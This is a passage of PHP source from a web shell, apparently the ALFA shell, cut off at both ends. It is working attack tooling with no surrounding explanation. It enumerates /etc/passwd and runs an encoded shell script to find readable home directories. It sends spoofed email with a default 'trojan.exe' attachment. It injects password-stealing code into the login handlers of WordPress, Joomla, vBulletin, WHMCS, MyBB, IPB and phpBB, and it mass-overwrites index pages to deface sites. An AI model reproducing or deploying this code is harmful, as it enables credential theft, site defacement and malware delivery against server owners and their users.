$passwd = _alfa_file(‘/etc/passwd’);
if(is_array($passwd)){
$users = array();
$makepwd = alfaMakePwd();
$basedir = @ini_get(‘open_basedir’);
$safe_mode = @ini_get(‘safe_mode’);
if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
$bash = “fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP”;
alfaWriteTocgiapi(“basedir.alfa”,$bash);
$bash_users  = alfaEx(“cd alfacgiapi;sh basedir.alfa “.$makepwd,false,true,true);
$users = json_decode($bash_users, true);
$x=count($users);
if($x>=2){array_pop($users);–$x;}
}
if(!$basedir&&!$safe_mode){
$x=0;
foreach($passwd as $str){
$pos = strpos($str,’:’);
$username = substr($str,0,$pos);
$dirz = str_replace(“{user}”, $username, $makepwd);
if(($username != ”)){
if (@is_readable($dirz)){
array_push($users,$username);
$x++;
}}}
}
echo ‘<br><br>’;
echo “<b><font color=\”#00A220\”>[+] Founded “.sizeof($passwd).” entrys in /etc/passwd\n”.”<br /></font></b>”;
echo “<b><font color=\”#FFFFFF\”>[+] Founded “.$x.” readable “.str_replace(“{user}”, “*”, $makepwd).” directories\n”.”<br /></font></b>”;
echo “<b><font color=\”#FF0000\”>[~] Searching for passwords in config files…\n\n”.”<br /><br /><br /></font></b>”;
foreach($users as $user){
if(empty($user))continue;
$path = str_replace(“{user}”, $user, $makepwd);
echo “<form method=post onsubmit=’g(\”FilesMan\”,this.c.value,\”\”);return false;’><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class=’foottable’ type=text name=c value=’$path’><input type=submit value=’>>’></form><br>”;
}
}else{echo(‘<b> <center><font color=”#FFFFFF”>[-] Error : coudn`t read /etc/passwd [-]</font></center></b>’);}
echo ‘<br><br></b>’;
echo ‘</div>’;
alfafooter();
}
function alfamail(){
alfahead();
echo ‘<div class=header>’;
AlfaNum(8,9,10);
echo ‘<center><p><div class=”txtfont_header”>| Fake Mail |</div></p><form action=”” method=”post” onsubmit=”g(\’mail\’,null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\’>>\’,this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;”>’;
$table = array(
‘td1′ => array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mail To : ‘, ‘inputName’ => ‘mail_to’, ‘inputValue’ => ‘target@fbi.gov’, ‘inputSize’ => ’60′,’placeholder’ => true),
‘td2′ => array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘From : ‘, ‘inputName’ => ‘mail_from’, ‘inputValue’ => ‘sec@google.com’, ‘inputSize’ => ’60′, ‘placeholder’ => true),
‘td3′ => array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Subject : ‘, ‘inputName’ => ‘mail_subject’, ‘inputValue’ => ‘your site hacked by me’, ‘inputSize’ => ’60′),
‘td4′ => array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Attach File : ‘, ‘inputName’ => ‘mail_attach’, ‘inputValue’ => $GLOBALS['cwd'].’trojan.exe’, ‘inputSize’ => ’60′),
‘td5′ => array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Count Mail : ‘, ‘inputName’ => ‘count_mail’, ‘inputValue’ => ’1′, ‘inputSize’ => ’60′)
);
create_table($table);
echo ‘<p><div class=”txtfont”>Message:</div></p><textarea rows=”6″ cols=”60″ name=”mail_content”>Hi Dear Admin :)</textarea><p><input type=”submit” value=” ” name=”mail_send” /></p></form></center>’;
if(isset($_POST['alfa4'])&&($_POST['alfa4'] == ‘>>’)){
$mail_to = $_POST['alfa1'];
$mail_from = $_POST['alfa2'];
$mail_subject = $_POST['alfa3'];
$mail_content = $_POST['alfa5'];
$count_mail = (int)$_POST['alfa6'];
$mail_attach = $_POST['alfa7'];
if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
if(!empty($mail_attach)&&@is_file($mail_attach)){
$file = $mail_attach;
$content = __read_file($file);
$content = chunk_split(__ZW5jb2Rlcg($content));
$uid = md5(uniqid(time()));
$filename = basename($file);
$headers  = “From: “.$mail_from.” <”.$mail_from.”>\r\n”;
$headers .= “To: ” . $mail_to. ” ( “.$mail_to.” ) \r\n”;
$headers .= “Reply-To: “.$mail_from.”\r\n”;
$headers .= “Content-Type: multipart/mixed; boundary=\””.$uid.”\”\r\n\r\n”;
$headers .= ‘MIME-Version: 1.0′ . “\r\n”;
$headers .= ‘X-Mailer: php’ . “\r\n”;
$mail_content  = “–”.$uid.”\r\n”;
$mail_content .= “Content-type:text/plain; charset=iso-8859-1\r\n”;
$mail_content .= “Content-Transfer-Encoding: 7bit\r\n\r\n”;
$mail_content .= $mail_content.”\r\n\r\n”;
$mail_content .= “–”.$uid.”\r\n”;
$mail_content .= “Content-Type: application/octet-stream; name=\””.$filename.”\”\r\n”;
$mail_content .= “Content-Transfer-Encoding: base64\r\n”;
$mail_content .= “Content-Disposition: attachment; filename=\””.$filename.”\”\r\n\r\n”;
$mail_content .= $content.”\r\n\r\n”;
$mail_content .= “–”.$uid.”–”;
}else{
$headers  = “From: ” . $mail_from. ” ( “.$mail_from.” ) \r\n”;
$headers .= “To: ” . $mail_to. ” ( “.$mail_to.” ) \r\n”;
$headers .= ‘Reply-To: ‘.$mail_from.” . “\r\n”;
$headers .= ‘Content-type: text/html; charset=utf-8′ . “\r\n”;
$headers .= ‘MIME-Version: 1.0′ . “\r\n”;
$headers .= ‘X-Mailer: php’ . “\r\n”;
}
if(empty($count_mail)||$count_mail<1)$count_mail=1;
if(!empty($mail_from)){echo __pre();
for($i=1;$i<=$count_mail;$i++){
if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo(“<center>Sent -> $mail_to<br></center>”);
}}else{__alert(“Invalid Mail From !”);}
}else{__alert(“Invalid Mail To !”);}
}
echo(‘</div>’);
alfafooter();
}
function alfaziper(){
alfahead();
AlfaNum(8,9,10);
echo ‘<div class=header><p><center><p><div class=”txtfont_header”>| Compressor |</div></p>
<form onSubmit=”g(\’ziper\’,null,null,null,this.dirzip.value,this.zipfile.value,\’>>\’);return false;” method=”post”>
<div class=”txtfont”>Dir/File: </div> <input type=”text” name=”dirzip” value=”‘.htmlspecialchars($GLOBALS['cwd']).’” size=”60″/>
<div class=”txtfont”>Save Dir: </div> <input type=”text” name=”zipfile” value=”‘.$GLOBALS['cwd'].’alfa.zip” size=”60″/>
<input type=”submit” value=” ” name=”ziper” />
</form></center></p>’;
if(isset($_POST['alfa5']) && ($_POST['alfa5'] == ‘>>’)){
$dirzip = $_POST['alfa3'];
$zipfile = $_POST['alfa4'];
if (class_exists(‘ZipArchive’)&&($GLOBALS['sys']!=’unix’||!_alfa_can_runCommand(true,true))){
$code=’if(!extension_loaded(\’zip\’)||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\’\\\\\’,\’/\’,realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\’\\\\\’,\’/\’,$file);if(in_array(substr($file,strrpos($file,\’/\’)+1),array(\’.\’,\’..\’)))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\’/\’,\’\’,$file.\’/\’));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\’/\’,\’\’,$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();’;
$newfunc = create_function(‘$source,$destination’, $code);
if($newfunc($dirzip, $zipfile)){
echo __pre().’<center><p><font color=”green”>Success…!<br>’.$zipfile.’</font></p></center>’;
}else{echo __pre().’<center><p><font color=”red”>ERROR!!!…</font></p></center>’;}
}else{
alfaEx(“cd ‘”.addslashes(dirname($zipfile)).”‘;zip -r ‘”.addslashes(basename($zipfile)).”‘ ‘”.addslashes($dirzip).”‘ > /dev/null &”);
echo __pre().’<center><p>Please Wait For 1 minutes AND Check this -> <b><font color=”green”>’.$zipfile.’</font></b><br>Because We Executed The Command in The background !</p></center>’;
}}
echo ‘</div>’;
alfafooter();
}
function alfacmshijacker(){
alfahead();
AlfaNum(5,6,7,8,9,10);
echo ‘<div class=header><br>
<center><div class=”txtfont_header”>| Cms Hijacker |</div><br><br><form onSubmit=”g(\’cmshijacker\’,null,this.cmshi.value,this.saveto.value,\’>>\’,this.cmspath.value);return false;” method=\’post\’>
<div class=”txtfont”>CMS: <select style=”width:100px;” name=”cmshi”>’;
$cm_array = array(“vb”=>”vBulletin”,”wp”=>”wordpress”,”jom”=>”joomla”,”whmcs”=>”whmcs”,”mybb”=>”mybb”,”ipb”=>”ipboard”,”phpbb”=>”phpbb”);
foreach($cm_array as $key=>$val)echo ‘<option value=”‘.$key.’”>’.$val.’</option>’;
echo(“</select>”);
echo ‘ Path installed cms: <input size=”50″ type=”text” name=”cmspath” placeholder=”ex: /home/user/public_html/vbulletin/”>
SaveTo: <input size=”50″ type=”text” name=”saveto” value=”‘.$GLOBALS['cwd'].’alfa.txt”></font>
<input type=”submit” name=”btn” value=” “></form></center><br>’;
$cms = $_POST['alfa1'];
$saveto = $_POST['alfa2'];
$cmspath = $_POST['alfa4'];
if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == ‘>>’){
echo __pre();
alfaHijackCms($cms,$cmspath,$saveto);
}
echo ‘</div>’;
alfafooter();
}
function alfaHijackCms($cms,$cmspath,$saveto){
switch($cms){
case “vb”:
hijackvBulletin($cmspath,$saveto);
break;
case “wp”:
hijackwp($cmspath,$saveto);
break;
case “jom”:
hijackJoomla($cmspath,$saveto);
break;
case “whmcs”:
hijackWhmcs($cmspath,$saveto);
break;
case “mybb”:
hijackMybb($cmspath,$saveto);
break;
case “ipb”:
hijackIPB($cmspath,$saveto);
break;
case “phpbb”:
hijackPHPBB($cmspath,$saveto);
break;
default:
echo “error!”;
break;
}
}
function hijackvBulletin($path,$saveto){
$code=’$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = “{saveto_path}”;$sql_query = $db->query_read(“SELECT * FROM ” . TABLE_PREFIX . “user WHERE `username`=\’” . $alfa_username . “\’”);while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, “a+”);@fwrite($fp1, $alfa_username . \’ : \’ .  $alfa_password.” (” . $row["email"] . “)\n”);@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, “w”);foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}’;
$clearpw = ‘defined(\’DISABLE_PASSWORD_CLEARING\’)’;
$code=str_replace(‘{saveto_path}’,$saveto,$code);
$login = $path.”/login.php”;
$class = $path.”/includes/class_bootstrap.php”;
$dologin = ‘do_login_redirect();’;
$evil_login = “\t”.$code.”\n\t”.$dologin;
$evil_class = “true”;
if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
$data_login = @file_get_contents($login);
$data_class = @file_get_contents($class);
if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
$login_replace = str_replace($dologin,$evil_login, $data_login);
$class_replace = str_replace($clearpw,$evil_class, $data_class);
@file_put_contents($login, $login_replace);
@file_put_contents($class, $class_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackwp($path,$saveto){
$code = ‘$alfa_file=”{saveto_path}”;$fp = fopen($alfa_file, “a+”);fwrite($fp, $_POST[\'log\'].” : “.$_POST[\'pwd\'].” (“.($user->user_email).”)\n”);fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, “w”);foreach($new as $values){@fputs($fp, $values);}@fclose($fp);’;
$redirect_wp = ‘if ( !is_wp_error($user) && !$reauth ) {‘;
$code=str_replace(‘{saveto_path}’,$saveto,$code);
$login=$path.”/wp-login.php”;
$evil_login = “\t”.$redirect_wp.”\n\t”.$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $redirect_wp)){
$login_replace = str_replace($redirect_wp,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackJoomla($path,$saveto){
$code = ‘<?php jimport(\’joomla.user.authentication\’);$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\’username\’=>$_POST[\'username\'],\’password\’=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file=”{saveto_path}”;$fp=@fopen($alfa_file,”a+”);@fwrite($fp, $Alfa_response->username.”:”.$_POST[\'passwd\'].” ( “.$Alfa_response->email.” )\n”);@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, “w”);foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>’;
$code=str_replace(‘{saveto_path}’,$saveto,$code);
$comp=$path.”/administrator/components/com_login/”;
if(@is_file($comp.”/login.php”)){
$login = $comp.”/login.php”;
}elseif(@is_file($comp.”/admin.login.php”)){
$login = $comp.”/admin.login.php”;
}else{
$login = ”;
}
if(@is_file($login) AND @is_writable($login) AND $login != ”){
$data_login = @file_get_contents($login);
$evil_login = $code.”\n”.$data_login;
@file_put_contents($login, $evil_login);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}
function hijackWhmcs($path,$saveto){
$code = ‘<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = “{saveto_path}”;$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = “SELECT * FROM tbladmins WHERE `username` = \’$alfa_uname\’ AND `password` = \’”.md5($alfa_pw).”\’”;$admin = true;}else{$alfa_q = “SELECT * FROM tblclients WHERE `email` = \’$alfa_uname\’”;$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\’:\’, $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\’:\’.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, “a+”);@fwrite($fp, $row[\'username\'] . \’ : \’ .  $alfa_pw.” (” . $row["email"] . “) : “.($admin ? \’is_admin\’ : \’is_user\’).”\n”);@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, “w”);foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>’;
$code=str_replace(‘{saveto_path}’,$saveto,$code);
$conf=$path.”/configuration.php”;
if(@is_file($conf) AND @is_writable($conf)){
$data_conf = @file_get_contents($conf);
if(!strstr($data_conf,’?>’))$code = ‘?>’.$code;
$evil_conf = $data_conf.”\n”.$code;
@file_put_contents($conf, $evil_conf);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}
function hijackMybb($path,$saveto){
$code = ‘$alfa_q = $db->query(“SELECT `email` FROM “.TABLE_PREFIX.”users WHERE `username` = \’”.$user[\'username\'].”\’”);$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = “{saveto_path}”;$fp = @fopen($alfa_file, “a+”);@fwrite($fp, $user[\'username\'].” : “. $user[\'password\'].” ( “.$alfa_fetch[\'email\'].” )\n”);@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, “w”);foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);’;
$find = ‘$loginhandler->complete_login();’;
$code=str_replace(‘{saveto_path}’,$saveto,$code);
$login=$path.”/member.php”;
$evil_login = “\t”.$code.”\n\t”.$find;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackIPB($path,$saveto){
$code = ‘$Alfa_q = $this->DB->buildAndFetch(array(\’select\’ => \’email\’, \’from\’ => \’members\’, \’where\’ => \’name=”\’.$username.\’” OR email=”\’.$email.\’”\’));$Alfa_file = “{saveto_path}”;$fp = @fopen($Alfa_file, “a+”);@fwrite($fp, $_POST[\'ips_username\'].\’ : \’.$_POST[\'ips_password\'].\’ ( \’.$Alfa_q[\'email\'].\’ )\’.”\n”);@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, “w”);foreach($new as $values){@fputs($fp, $values);}@fclose($fp);’;
$find = ‘unset( $member[\'plainPassword\'] );’;
$code=str_replace(‘{saveto_path}’,$saveto,$code);
$login=$path.”/admin/sources/handlers/han_login.php”;
$evil_login = “\t”.$find.”\n\t”.$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackPHPBB($path,$saveto){
$code = ‘$Alfa_u = request_var(\’username\’, \’\’);$Alfa_p = request_var(\’password\’, \’\’);if($Alfa_u != \’\’ AND $Alfa_p != \’\’){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file =”{saveto_path}”;$fp = @fopen($Alfa_file, “a+”);@fwrite($fp, $Alfa_u.” : “.$Alfa_p. ” ( “.$Alfa_response[\'user_row\'][\'user_email\'].” )\n”);@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, “w”);foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}’;
$find = ‘case \’login\’:’;
$code=str_replace(‘{saveto_path}’,$saveto,$code);
$login=$path.”/ucp.php”;
$evil_login = “\t”.$find.”\n\t”.$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackOutput($c=0,$p=”){echo($c==0?”<center><font color=’green’>Success</font> –> path: $p</center>”:’<center><font color=”red”>Error in inject code !</font></center>’);}
function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
if(@is_dir($dir)){
$files=@scandir($dir);
foreach($files as $key => $value){
$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
if(!@is_dir($path)){
if($ext!=’*’){$f = basename($path);$f = explode(‘.’,$f);$f = end($f);if($f!=$ext)continue;}
if($e==’str’){
$content = @file_get_contents($path);
if(strpos($content, $string) !== false){
echo str_replace(‘\\’,’/’,$path) . “<br>”;
}
}else{
if(strstr($value,$string)){
echo str_replace(‘\\’,’/’,$path) . “<br>”;
}
}
$results[] = $path;
}elseif($value != “.” && $value != “..”) {
Alfa_StrSearcher($path,$string,$ext,$e,$results);
$results[] = $path;
}}}}
function alfasearcher(){
alfahead();
echo ‘<div class=header><center><p><div class=”txtfont_header”>| Searcher |</div></p><h3><a href=javascript:void(0) onclick=”g(\’searcher\’,null,\’file\’)”>| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick=”g(\’searcher\’,null,\’str\’)”>| Find Files By Name | </a></h3></center>’;
if(isset($_POST['alfa1'])&&$_POST['alfa1']==’file’){
echo ‘<center><div class=”txtfont_header”>| Find Readable Or Writable Files  |</div><br><br><form name=”srch” onSubmit=”g(\’searcher\’,null,\’file\’,this.filename.value,this.ext.value,this.method.value,\’>>\’);return false;” method=\’post\’>
<div class=”txtfont”>
Method: <select style=”width: 18%;” onclick=”alfa_searcher_tool(this.value);” name=”method”><option value=”files”>Find All Writable Files</option><option value=”dirs”>Find All Writable Dirs</option><option value=”all”>Find All Readable And Writable Files</option></select>
Dir: <input size=”50″ id=”target” type=”text” name=”filename” value=”‘.$GLOBALS['cwd'].’”>
Ext: <small><font color=”red”>[ * = all Ext ]</font></small> <input id=”ext” style=”text-align:center;” type=”text” name=”ext” size=”5″ value=”php”>
<input type=”submit” name=”btn” value=” “></div></form></center><br>’;
$dir = $_POST['alfa2'];
$ext = $_POST['alfa3'];
$method = $_POST['alfa4'];
if($_POST['alfa5']==’>>’){
echo __pre();
if(substr($dir,-1)==’/’)$dir=substr($dir,0,-1);
Alfa_Searcher($dir,trim($ext),$method);
}
}
if($_POST['alfa1']==’str’){
echo ‘<center><div class=”txtfont_header”>| Find Files By Name / Find String In Files |</div><br><br><form onSubmit=”g(\’searcher\’,null,\’str\’,this.dir.value,this.string.value,\’>>\’,this.ext.value,this.method.value);return false;” method=\’post\’>
<div class=”txtfont”>
Method: <select name=”method”><option value=”name”>Find Files By Name</option><option value=”str”>Find String In Files</option></select>
String: <input type=”text” name=”string” value=””>
Dir: <input size=”50″ type=”text” name=”dir” value=”‘.$GLOBALS['cwd'].’”>
Ext: <small><font color=”red”>[ * = all Ext ]</font></small> <input id=”ext” style=”text-align:center;” type=”text” name=”ext” size=”5″ value=”php”>
<input type=”submit” name=”btn” value=” “></div></form></center><br>’;
$dir = $_POST['alfa2'];
$string = $_POST['alfa3'];
$ext = $_POST['alfa5'];
if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == ‘>>’){
echo __pre();
Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
}
}
echo ‘</div>’;
alfafooter();
}
function alfaMassDefacer(){
alfahead();
AlfaNum(5,6,7,8,9,10);
echo “<div class=header><center><p><div class=’txtfont_header’>| Mass Defacer |</div></p><form onSubmit=\”g(‘MassDefacer’,null,this.massdir.value,this.defpage.value,this.method.value,’>>’);return false;\” method=’post’>”;
echo ‘<div class=”txtfont”>Deface Method: <select name=”method”><option value=”index”>Deface Index Dirs</option><option value=”all”>All Files</option></select>
Mass dir: <input size=”50″ id=”target” type=”text” name=”massdir” value=”‘.htmlspecialchars($GLOBALS['cwd']).’”>
DefPage: <input size=”50″ type=”text” name=”defpage” value=”‘.htmlspecialchars($GLOBALS['cwd']).’”></div> <input type=”submit” name=”btn” value=” “></center></p>
</form>’;
$dir = $_POST['alfa1'];
$defpage = $_POST['alfa2'];
$method = $_POST['alfa3'];
$fCurrent = $GLOBALS['__file_path'];
if($_POST['alfa4'] == ‘>>’){
if(!empty($dir)){
if(@is_dir($dir)){
if(@is_readable($dir)){
if(@is_file($defpage)){
if($dh = @opendir($dir)){
echo __pre();
while (($file = @readdir($dh)) !== false){
if($file == ‘..’ || $file == ‘.’)continue;
$newfile=$dir.$file;
if($fCurrent == $newfile)continue;
if(@is_dir($newfile)){
Alfa_ReadDir($newfile,$method,$defpage);
}else{
if(!@is_writable($newfile))continue;
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}else{__alert(‘<font color=”red”>Error In OpenDir…</font>’);}
}else{__alert(‘<font color=”red”>DefPage File NotFound…</font>’);}
}else{__alert(‘<font color=”red”>Directory is not Readable…</font>’);}
}else{__alert(‘<font color=”red”>Mass Dir is Invalid Dir…</font>’);}
}else{__alert(‘<font color=”red”>Dir is Empty…</font>’);}
}
echo ‘</div>’;
alfafooter();
}
function Alfa_ReadDir($dir,$method=”,$defpage=”){
if(!@is_readable($dir)) return false;
if (@is_dir($dir)) {
if ($dh = @opendir($dir)) {
while(($file=readdir($dh))!==false) {
if($file == ‘..’ || $file == ‘.’)continue;
$newfile=$dir.’/’.$file;
if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
if(@is_file($newfile)){
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}
}
}
function Alfa_Rewriter($dir,$file,$defpage,$m=’index’){
if(!@is_writable($dir)) return false;
if(!@is_readable($dir)) return false;
$defpage=@file_get_contents($defpage);
if($m == ‘index’){
$indexs = array(‘index.php’,’index.htm’,’index.html’,’default.asp’,’default.aspx’,’index.asp’,’index.aspx’,’index.js’);
if(in_array(strtolower($file),$indexs)){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir.”<b><font color=’red’>DeFaced…</b></font><br>” : ”;
}
}elseif($m==’all’){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir.”  <b><font color=’red’>DeFaced…</b></font><br>” : ”;
}
}
function alfaGetDisFunc(){
alfahead();
echo ‘<div class=”header”>’;
$disfun = @ini_get(‘disable_functions’);
$s = explode(‘,’,$disfun);
$f = array_unique($s);
echo ‘<center><br><b><font color=”#7CFC00″>Disable Functions</font></b><pre><table border=”1″><tr><td align=”center” style=”background-color: green;color: white;width:5%”>#</td><td align=”center” style=”background-color: green;color: white;”>Func Name</td></tr>’;
$i=1;
foreach($f as $s){
$s=trim($s);
if(function_exists($s)||!is_callable($s))continue;
echo ‘<tr><td align=”center” style=”background-color: black;”>’.$i.’</td>’;
echo ‘<td align=”center” style=”background-color: black;”><a style=”text-decoration: none;” target=”_blank” href=”http://php.net/manual/en/function.’.str_replace(‘_’,’-’,$s).’.php”><span class=”disable_functions”><b>’.$s.’</b></span></a></td>’;
$i++;
}
echo ‘</table></center>’;
echo ‘</div>’;
alfafooter();
}
function Alfa_Create_A_Tag($action,$vals){
$nulls = array();
foreach($vals as $key => $val){
echo ‘<a href=javascript:void(0) onclick=”g(\”.$action.’\’,’;
for($i=1;$i<=$val[1]-1;$i++)$nulls[] = ‘null’;
$f = implode(‘,’,$nulls);
echo $f.’,\”.$val[0].’\’);return false;”>| ‘.$key.’ | </a>’;
unset($nulls);
}
}
function Alfa_Searcher($dir, $ext, $method) {
if(@is_readable($dir)){
if($method == ‘all’)$ext = ‘*’;
if($method == ‘dirs’)$ext = ‘*’;
$globFiles = @glob(“$dir/*.$ext”);
$globDirs  = @glob(“$dir/*”, GLOB_ONLYDIR);
$blacklist = array();
foreach ($globDirs as $dir) {
if(!@is_readable($dir)) continue;
@Alfa_Searcher($dir, $ext, $method);
}
switch($method){
case “files”:
foreach ($globFiles as $file){
if(@is_writable($file)){
echo “$file<br>”;
}
}
break;
case “dirs”:
foreach ($globFiles as $file){
if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
echo dirname($file).’<br>’;
$blacklist[] = dirname($file);
}
}
break;
case “all”:
foreach ($globFiles as $file){
echo $file.’<br>’;
}
break;
}
unset($blacklist);
}
}
function AlfaiFrameCreator($f,$width=’100%’,$height=’600px’){
return(‘<iframe src=”‘.$f.’” width=”‘.$width.’” height=”‘.$height.’” frameborder=”0″></iframe>’);
}
class AlfaCURL {
public $headers;
public $user_agent;
public $compression;
public $cookie_file;
public $proxy;
public $path;
public $ssl = false;
public $curl_status = true;
function __construct($cookies=false,$compression=’gzip’,$proxy=”){
if(!extension_loaded(‘curl’)){$curl_status = false;return false;}
$this->headers[] = ‘Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg’;
$this->headers[] = ‘Connection: Keep-Alive’;
$this->headers[] = ‘Content-type: application/x-www-form-urlencoded;charset=UTF-8′;
$this->user_agent = ‘Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)’;
$this->path = ALFA_TEMPDIR.’/Alfa_cookies.txt’;
$this->compression=$compression;
$this->proxy=$proxy;
$this->cookies=$cookies;
if($this->cookies)$this->cookie($this->path);
}
function cookie($cookie_file) {
if (_alfa_file_exists($cookie_file,false)) {
$this->cookie_file=$cookie_file;
}else{
@fopen($cookie_file,’w’) or die($this->error(‘The cookie file could not be opened.’));
$this->cookie_file=$cookie_file;
@fclose($this->cookie_file);
}
}
function Send($url,$method=”get”,$data=””){
if(!$this->curl_status){return false;}
$process = curl_init($url);
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($process, CURLOPT_HEADER, 0);
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_ENCODING , $this->compression);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
if($this->ssl){
curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
}
if($this->cookies){
curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
}
if($this->proxy){
curl_setopt($process, CURLOPT_PROXY, $this->proxy);
}
if($method==’post’){
curl_setopt($process, CURLOPT_POSTFIELDS, $data);
curl_setopt($process, CURLOPT_POST, 1);
